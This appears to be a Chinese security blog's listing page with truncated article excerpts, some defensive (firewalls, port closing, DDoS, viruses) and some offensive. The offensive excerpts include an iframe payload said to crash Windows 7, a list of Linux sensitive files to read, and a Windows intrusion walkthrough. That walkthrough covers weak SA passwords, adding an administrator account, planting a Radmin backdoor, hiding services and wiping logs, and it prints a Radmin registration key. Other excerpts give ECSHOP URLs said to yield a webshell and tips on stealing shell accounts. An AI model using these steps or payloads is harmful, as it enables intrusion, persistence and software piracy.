腾讯防刷负责人:基于用户画像大数据的电商防刷架构

发表时间:2015-10-29 12:49:23 文章分类:安全技术 阅读:258
本文由颜国平在高可用架构群所做的分享整理,转载请注明高可用架构公众号ArchNotes。颜国平,腾讯云-天御系统研发负责人。一直负责腾讯自有验证码、业务安全、防刷、账号安全等研发工作。内部支持的产品(游戏、电商、腾讯投资的O2O企业)非常广泛。在业务安全领域项目经验丰富,并且具备深度学习、大数据架构搭建等实战经验。一、背景介绍

一个简单的HTML标签搞死64位的 Windows 7

发表时间:2012-02-10 04:50:15 文章分类:安全技术 阅读:8356
< iframe height='18082563'>< /iframe> 这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3vil 报告的。 该漏洞在64位的Win7下的Safari 浏览器测试中招,我很讨厌蓝屏,因此没有测试其他浏览器。微软正在进一步验证该漏洞,下面是关于该漏洞的一些技术细节:目前个人测试32位win7没事,但是卡巴会拦截并报病毒,只要包含iframe那段代码,保存到本地文件,会报该文件为病毒,浏览网页会拦截注意:请为自己的测试负责描述: 该漏洞是由于 win32k.sys 的一个错误导致内存的崩溃,当页面上包含一个 iframe,其 height 属性是个非常大的值时该错误就会发生。目前该漏洞仅存在于64位的win7系统。解决方案:目前尚无有效方案

Win XP的一个无敌命令 -- 替换正在使用中的文件

发表时间:2010-07-28 02:21:27 文章分类:安全技术 阅读:9084
 XP有一个很无敌的命令,用来替换文件的replace,连正在使用的文件也能替换,非常无敌。 比如:在C:下建一个目录c:\abc ,然后复制一首mp3到c:\abc并命名为aaaa.mp3 ,然后再复制另一首歌到C:\a.mp3 ,然后用media player 播放aaaa.mp3 ,在命令提示符下输入:replace c:\a.mp3 c:\abc,过一会,是不是播放的歌已变为另一首。 用这个命令来替换系统文件真是太爽了,并且XP的系统文件保护也对它无效。 再也不用到安全模式下去替换文件了。 格式 REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/W] REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/S] [/W] [drive1:][path1]filename 指定源文件。 [drive2:][path2] 指定要替换文件的目录。 /A 把新文件加入目标目录。不能和/S 或 /U 命令行开关搭配使用。/P 替换文件或加入源文件之前会先提示您进行确认。/R 替换只读文件以及未受保护的文件。/S 替换目标目录中所有子目录的文件。不能与 /A 命令选项搭配使用。/W 等您插入磁盘以后再运行。/U 只会替换或更新比源文件日期早的文件。 不能与 /A 命令行开关搭配使用

linux敏感文件

发表时间:2010-07-28 02:04:15 文章分类:安全技术 阅读:41937
 etc/httpd/conf/httpd.conf/etc/rc.local   有时可以读出来apache的路径/usr/local/apache/conf/httpd.conf/var/www/html/apache/conf/httpd.conf/home/httpd/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/httpd/conf/httpd.conf/etc/apache/httpd.conf/usr/local/lib/php.ini/etc/hosts.deny 定义禁止访问本机的主机/etc/bashrc bash shell 的系统全局配置/etc/group 系统用户组的定义文件/etc/httpd/httpd.conf/etc/issue 显示Linux核心的发行版本信息(用于本地登陆用户)/etc/issue/net 显示Linux核心和发行版本信息(用于远程登陆用户)----没成功/etc/ssh/ssh_config   ssh配置文件/etc/termcap 终端定义和配置文件/etc/xinetd.d/etc/mtab     包含当前安装的文件系统列表   有时可以读取到当前网站的路径redhat-release:包含识别当前Red Hat 版本号的字符串shells:列出可用在系统上的shell命令行解释器(bash,sh,csh等).

如何入侵3389(禁止转载)

发表时间:2010-03-09 04:00:34 文章分类:安全技术 阅读:64330
工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:[separator]08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及  不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。    一.扫到SA弱口令(自动攻击器)    二.用SQLTOOLS连上去建一个用户net start telnet开telnet服务net user mint mint /add添加用户mint密码为mint net localgroup administrators mint /add将帐号mint升级为管理员    三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)制作RAD.EXE过程:1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;2、在本地设置服务端(一定要生成);设置密码-->>设置连接端口(默认4489)-->>生成3、导出注册表HKEY_LOCAL_MACHINE\SYSTE

ECSHOP2.6.2后台拿WEBSHELL

发表时间:2010-03-09 03:54:26 文章分类:安全技术 阅读:103948
http://www.ecshop.com/admin/integrate.php?act=sync&del_list=[separator]http://www.ecshop.com/admin/integrate.php?act=sync&rename_list=http://www.ecshop.com/admin/integrate.php?act=sync&ignore_list= 三个链接,随便输入一个就可以了,生成http://www.ecshop.com/data/integrate__log.php

DDOS攻击防范方法

发表时间:2010-03-05 15:47:30 文章分类:安全技术 阅读:85644
        一桶水的最大容量不是由它最高的地方决定的,而是由它最低的地方决定,服务器也是一样,服务器的安全性也是由它最脆弱的地方决定的,最脆弱的地方有多危险服务器就有多危险。[separator]       DDOS也是一样,只要你的服务器存在一个很耗资源的地方,限制又不够,就马上成为别人DDOS的对象.比如SYN-FLOOD,它就是利用服务器的半连接状态比完全连接状态更耗资源,而SYN发动方只需要不停的发包,根本不需要多少资源           一个好的DDOS攻击必须是通过自己极少资源的消耗带来对方较大的资源消耗,否则比如ICMP-FLOOD和UDP-FLOOD都必须和别人一样大的带宽,对方服务器消耗多少资源自己也得赔上多少资源,效率极其低下,又很容易被人发现,现在基本没有什么人用了。攻击原理  CC主要是用来攻击页面的.大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观,现在知道为什么很多空间服务商都说大家不要上传论坛,聊天室等东西了吧。  一个静态页面不需要服务器多少资源,甚至可以说直接从内存中读出来发给你就可以了,但是论坛就不一样了,我看一个帖子,系统需要到数据库中判断我是否有读读帖子的权限,如果有,就读出帖子里面的内容,显示出来——这里至少访问了2次数据库,如果数据库的体积有200MB大小,系统很可能就要在这200MB大小的数据空间搜索一遍,这需要多少的CPU资源和时间?如果我是查找一个关键字,那么时间更加可观,因为前面的搜索可以限定在一个很小的范围内,比如用户权限只查用户表,帖子内容只查帖子表,而且查到就可以马上停止查询,而搜索肯定会对所有的数据进行一次判断,消耗的时间是相当的大。  CC就是充分利用了这个

网络安全技术与黑客攻击威胁

发表时间:2010-01-24 16:30:08 文章分类:安全技术 阅读:117494
暂无文章介绍

十七点安全知识详细了解进程和病毒

发表时间:2010-01-24 16:28:15 文章分类:安全技术 阅读:46004
第一:进程是什么进程为应用程序的运行实例,是应用程序的一次动态执行。看似高深,我们可以简单地理解为:它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括:系统管理计算机个体和完成各种操作所必需的程序;用户开启、执行的额外程序,当然也包括用户不知道,而自动运行的非法程序(它们就有可能是病毒程序)。 危害较大的可执行病毒同样以“进程”形式出现在系统内部(一些病毒可能并不被进程列表显示,如“宏病毒”),那么及时查看并准确杀掉非法进程对于手工杀毒有起着关键性的作用。[separator]第二:什么是木马木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。 传染方式:通过电子邮件附件发出,捆绑在其他的程序中。 病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。 木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法操作。 防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。第三:什么是计算机病毒计算机病毒是一个程序,一段可执行码。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。 除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。可以从不同角度给出计算机

入侵者的秘密

发表时间:2010-01-24 16:26:34 文章分类:安全技术 阅读:96723
1、能用Perl(Unix下的语言,现在已经可以用于NT下)或C编程,写一些基本的安全工具, 高手们还能分析目标操作系统的源代码,找出这些系统的漏洞,从而达到攻击目的。他们还能把一些优秀的代码移植到自己用的平台上,或许还能开发一些扩展工具,扩大工具的攻击能力。甚至有些工具还提供二次开发的功能。[separator]2、透彻地了解TCP/IP协议,至少知道Internet是如何运转的。这是最基本的。最好要了解TCP/IP协议本身如IP报文头的结构。而并不需要是电脑专业本科或硕士。3、深入地了解至少2个以上的操作系统,其中之一无疑是Unix或者VMS。4、有一台自己作主的电脑(不一定要工作站)和至少一个Modem(不要笑)。5、每个月至少有60小时上Internet(我有200小时,不过我不算),光会编程是不够的,如果一个刚上internet的优秀程序员和别人打架,也许一个12岁的小孩就可以把他的启动文件改得面目全非。所以经验是很重要的,失眠也是必要的,最好的攻击时刻往往是凌晨,因为那时Internet显得不怎么拥挤。你可能因为深夜工作时常和你女朋友翻脸,也可能因为不小心而惹来一些麻烦,所以较强的心理素质和耐心也是必须具备的。6、可能需要收集一些比较老的,过时的软件,因为这些软件也许可以帮你解决最新东西不可能解决的问题。7、真正的入侵者喜欢攻击安全性很高的主机,攻击以前有充分的准备。运用IP欺骗是一个推荐的方法。白天一般有系统管理员在线,如果贸然进去,发现异常的他们会紧紧跟来;所以还有一点是不会直接攻击,一般远程登录到一台主机,再由这台机登录到目标。很多ISP只提供ppp,而不提供Unix shell环境,shell环境可以使很多事情变得方便,所以一个shell帐号是首先要偷的东西。8、他们一般使用Unix,FreeBSD或者linux,也有的使用Windows NT,不要太小看微软,WindowsNT 的性能远远超过windows95,并有很

如何使用“IP安全策略”快速关闭端口

发表时间:2010-01-24 16:20:08 文章分类:安全技术 阅读:122608
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。[separator]   为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WindowsXP/2000/2003下关闭这些网络端口:  第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。  第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。  第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。

更新换代与时俱进 细数现代病毒新伎俩

发表时间:2010-01-24 16:18:15 文章分类:安全技术 阅读:50947
很久很久以前,这个世界上没有木马,只有病毒,病毒们的作用也很单一,比如破坏可执行文件,比如不断产生垃圾侵占磁盘空间……记得黑色星期五、米开朗基罗、在屏幕上乱跳的stone么,记得当年闻之色变的dirII 么,记得当年的scan、kill99、cpav以及msav么?呵呵,都是只能从化石博物馆里翻出来的东西了。当时的病毒代码都是极其固定的,所以杀毒软件们的使命很简单,对文件进行二进制匹配,符合,杀之,不符合,忽略之。[separator]    之后,出现了代码不完全固定的病毒,木马、病毒又有了些什么花样?随便找一个今天碰到的,看看表现形式:● 进程可以看到的有2-3个,不能看到的n个,互相监控,发现被关闭则自动再打开;● 监控系统进程,发现是杀毒/杀木马/进程管理软件的直接关闭;● 监控窗口标题和内容,发现访问关于自己的网页则直接关闭IE;● 利用启动菜单、注册表、服务、驱动,多重方式启动时加载;● 修改系统文件,在试图进入安全模式的时候蓝屏给你看;● 利用Image File Execution Options,把所有的杀毒/杀木马/进程管理软件加入,使得它们无法启动;● 自动搜索,在所有本地硬盘、移动存储器,建立自动运行,实现扩散传播;● 病毒文件名随机产生,无法通过一定规则过滤;● 其他的小伎俩还有很多,比如禁用进程管理器啊,修改txt/ini文件关联啊,不一而足。    尽管从理论上来说,上面的这些,都是有办法解决的,但是就算比较熟练的人,也要经过一定时间的分析和折腾,才“有可能”搞定,那么,对于普通的使用者来说呢,大部分的使用者,可能选择重装会更快捷一些。    经常听到朋友抱怨:怎么有那么多没事做的人,整天做病毒呢?很简单,一个利字,在这些表现的背后,木马/病毒们,关注的是你的系统控制权,关注的是你的qq密码,关注的是你的网游密码,甚至你的证券交

防火墙

发表时间:2010-01-24 16:15:52 文章分类:安全技术 阅读:105125
防火墙简介防火墙的特点实现防火墙的技术防火墙的体系结构及组合形式内部防火墙防火墙的未来发展趋势 [separator]防火墙简介    防火墙是一类防范措施的总称,它使得内部网络与Internet之间或者与其他外部网络互相隔离、限制网络互访用来保护内部网络。防火墙简单的可以只用路由器实现,复杂的可以用主机甚至一个子网来实现。设置防火墙目的都是为了在内部网与外部网之间设立唯一的通道,简化网络的安全管理。    防火墙的功能有:    1、过滤掉不安全服务和非法用户    2、控制对特殊站点的访问    3、提供监视Internet安全和预警的方便端点    由于互连网的开放性,有许多防范功能的防火墙也有一些防范不到的地方:    1、防火墙不能防范不经由防火墙的攻击。例如,如果允许从受保护网内部不受限制的向外拨号,一些用户可以形成与Internet的直接的连接,从而绕过防火墙,造成一个潜在的后门攻击渠道。    2、防火墙不能防止感染了病毒的软件或文件的传输。这只能在每台主机上装反病毒软件。    3、防火墙不能防止数据驱动式攻击。当有些表面看来无害的数据被邮寄或复制到Internet主机上并被执行而发起攻击时,就会发生数据驱动攻击。    因此,防火墙只是一种整体安全防范政策的一部分。这种安全政策必须包括公开的、以便用户知道自身责任的安全准则、职员培训计划以及与网络访问、当地和远程用户认证、拨出拨入呼叫、磁盘和数据加密以及病毒防护的有关政策。

WEB安全技术与防火墙

发表时间:2010-01-24 15:54:26 文章分类:安全技术 阅读:100077
暂无文章介绍